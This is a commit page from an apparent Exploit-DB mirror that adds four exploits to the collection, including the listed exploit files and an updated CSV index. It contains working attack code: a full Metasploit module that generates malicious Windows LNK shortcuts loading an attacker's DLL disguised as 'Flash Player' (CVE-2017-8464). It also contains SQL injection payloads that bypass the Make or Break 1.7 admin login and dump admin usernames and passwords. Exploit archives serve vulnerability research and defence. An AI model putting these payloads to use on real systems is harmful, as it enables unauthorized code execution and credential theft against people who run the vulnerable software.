bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-07-27

Browse source 
4 new exploits

Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)

Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)
Friends in War Make or Break 1.7 - Authentication Bypass
Friends in War Make or Break 1.7 - SQL Injection
This commit is contained in:
Offensive Security 2017-07-27 05:01:22 +00:00
parent 2351348891
commit 9d1eca86b2
6 changed files with 225 additions and 35 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -9152,6 +9152,7 @@ id,file,description,date,author,platform,type,port
42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15699,7 +15700,7 @@ id,file,description,date,author,platform,type,port
42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
42354,platforms/windows/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,"Mohamed Hamdy",windows,remote,0
42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
@ -38180,3 +38181,5 @@ id,file,description,date,author,platform,type,port
42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

2
platforms/php/webapps/10488.txt
View file

@ -130,7 +130,7 @@ and subdate(curdate(), interval 9999
9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1
and subdate(curdate(), interval 9999
## E-DB NOTE: Try 999 days if 9999 doesn't work in your environment.
## Exploit-DB Note: Try using "999 DAY)" if 9999 doesn't work in your environment.
I wrote a PoC, to get automatically the password hash of the WordPress
admin account:

25
platforms/php/webapps/42379.txt Executable file
View file

@ -0,0 +1,25 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: Make or Break
[x] Script Version: 1.7
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
[x] Author: Anarchy Angel
[x] Mail: anarchy[dot]ang31@gmail[dot]com
[x] More info: https://aahideaway.blogspot.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Navigate to scripts admin login page and submit admin' or ''='-- for username
and it should give you access to the admin area. A quick release to
kick off DefCon festivities. See you there! Enjoy >:)

18
platforms/php/webapps/42381.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #

33
platforms/windows/remote/42354.html → platforms/win_x86-64/remote/42354.html
View file

@ -1,36 +1,3 @@
# Exploit Title: Microsoft Internet Explorer - 'mshtml.dll' Remote
Code Execution (MS17-007)
# Google Dork: NA
# Date: 24/7/2017
# Exploit Author: Mohamed Hamdy - Nsecurity
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Internet Explorer 11
# Tested on: Windows 7 SP1 x86
# CVE : CVE-2017-0037
<!--
CVE-2017-0037
mshtml.dll::HandleColumnBreakOnColumnSpanningElement
Affected Version:
Microsoft Internet Explorer 10 and 11 and Microsoft Edge
Test Bed:
Microsoft Internet Explorer 10 and 11
OS: Windows 7 SP1 x86
Advisory:
https://technet.microsoft.com/en-us/library/security/ms17-007.aspx
Author: Mohamed Hamdy AKA "Nsecurity"
Email: n.s3curity.service@gmail.com
Jid : Nsecurity@jabber.ru
<!DOCTYPE html>
<html>
<head>

177
platforms/windows/local/42382.rb Executable file
View file

@ -0,0 +1,177 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
attr_accessor :exploit_dll_name
def initialize(info = {})
super(update_info(info,
'Name' => 'LNK Remote Code Execution Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
that contain a dynamic icon, loaded from a malicious DLL.
This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
similar except in an additional SpecialFolderDataBlock is included. The folder ID set
in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
DLL file.
},
'Author' =>
[
'Uncredited', # vulnerability discovery
'Yorick Koster' # msf module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2017-8464'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
['URL', 'http://paper.seebug.org/357/'], # writeup
['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Arch' => [ARCH_X86, ARCH_X64],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ],
[ 'Windows x86', { 'Arch' => ARCH_X86 } ]
],
'DefaultTarget' => 0, # Default target is 64-bit
'DisclosureDate' => 'Jun 13 2017'))
register_advanced_options(
[
OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
])
end
def exploit
dll = generate_payload_dll
dll_name = "#{rand_text_alpha(16)}.dll"
dll_path = store_file(dll, dll_name)
print_status("#{dll_path} created copy it to the root folder of the target USB drive")
# HACK the vulnerability doesn't appear to work with UNC paths
# Create LNK files to different drives instead
'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|
lnk = generate_link("#{i}:\\#{dll_name}")
lnk_path = store_file(lnk, "#{rand_text_alpha(16)}_#{i}.lnk")
print_status("#{lnk_path} create, copy to the USB drive if drive letter is #{i}")
end
end
def generate_link(path)
path << "\x00"
display_name = "Flash Player\x00" # LNK Display Name
comment = "\x00"
# Control Panel Applet ItemID with our DLL
cpl_applet = [
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
].pack('C*')
cpl_applet << [path.length].pack('v')
cpl_applet << [display_name.length].pack('v')
cpl_applet << path.unpack('C*').pack('v*')
cpl_applet << display_name.unpack('C*').pack('v*')
cpl_applet << comment.unpack('C*').pack('v*')
# LinkHeader
ret = [
0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
0x00, 0x00, 0x00, 0x00, # FileAttributes
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
0x00, 0x00, 0x00, 0x00, # FileSize
0x00, 0x00, 0x00, 0x00, # IconIndex
0x00, 0x00, 0x00, 0x00, # ShowCommand
0x00, 0x00, # HotKey
0x00, 0x00, # Reserved1
0x00, 0x00, 0x00, 0x00, # Reserved2
0x00, 0x00, 0x00, 0x00 # Reserved3
].pack('C*')
# IDList
idlist_data = ''
idlist_data << [0x12 + 2].pack('v') # ItemIDSize
idlist_data << [
# This PC
0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
idlist_data << [0x12 + 2].pack('v') # ItemIDSize
idlist_data << [
# All Control Panel Items
0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
0x30, 0x9d
].pack('C*')
idlist_data << [cpl_applet.length + 2].pack('v')
idlist_data << cpl_applet
idlist_data << [0x00].pack('v') # TerminalID
# LinkTargetIDList
ret << [idlist_data.length].pack('v') # IDListSize
ret << idlist_data
# ExtraData
# SpecialFolderDataBlock
ret << [
0x10, 0x00, 0x00, 0x00, # BlockSize
0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList
].pack('C*')
# TerminalBlock
ret << [0x00, 0x00, 0x00, 0x00].pack('V')
ret
end
# Store the file in the MSF local directory (eg, /root/.msf4/local/)
def store_file(data, filename)
ltype = "exploit.fileformat.#{self.shortname}"
if ! ::File.directory?(Msf::Config.local_directory)
FileUtils.mkdir_p(Msf::Config.local_directory)
end
if filename and not filename.empty?
if filename =~ /(.*)\.(.*)/
ext = $2
fname = $1
else
fname = filename
end
else
fname = "local_#{Time.now.utc.to_i}"
end
fname = ::File.split(fname).last
fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
fname << ".#{ext}"
path = File.join("#{Msf::Config.local_directory}/", fname)
full_path = ::File.expand_path(path)
File.open(full_path, "wb") { |fd| fd.write(data) }
full_path.dup
end
end